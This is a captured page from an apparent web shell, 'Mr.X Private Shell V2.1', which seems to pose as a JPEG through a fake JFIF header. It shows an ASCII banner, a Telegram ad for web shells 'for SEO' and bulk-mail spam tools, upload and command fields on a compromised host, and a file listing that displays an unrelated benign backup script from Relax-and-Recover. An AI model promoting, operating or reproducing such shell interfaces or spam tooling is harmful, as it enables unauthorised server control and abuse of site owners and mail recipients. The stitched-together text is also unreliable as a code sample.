����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
#
# show the last job that ran

# if no backupset is defined, query the user for it
if ! test "$GALAXY10_BACKUPSET" ; then
	let c=0 ; while read ; do backupsets[c++]="$REPLY" ; done < <(
		qlist backupset -c $HOSTNAME -a Q_LINUX_FS
	)

	LogPrint "
Found the following backupsets:
$(
		for ((d=0 ; d<c ; d++)) ; do
			echo "     [$d] ${backupsets[d]}"
		done
	)"

	# Use the original STDIN STDOUT and STDERR when rear was launched by the user
	# to get input from the user and to show output to the user (cf. _input-output-functions.sh):
	read -p "Please select the backupset to use: " answer 0<&6 1>&7 2>&8
	test $answer -ge 0 -a $answer -lt $c ||\
		Error "You must specify the backupset with its number."

	GALAXY10_BACKUPSET="${backupsets[answer]}"
fi

Filemanager

Name Type Size Permission Actions
400_start_galaxy_daemons.sh File 456 B 0644
410_ping_commcell.sh File 491 B 0644
420_login_to_galaxy_and_setup_environment.sh File 762 B 0644
500_select_backupset.sh File 755 B 0644
550_request_point_in_time_restore_parameters.sh File 1.83 KB 0644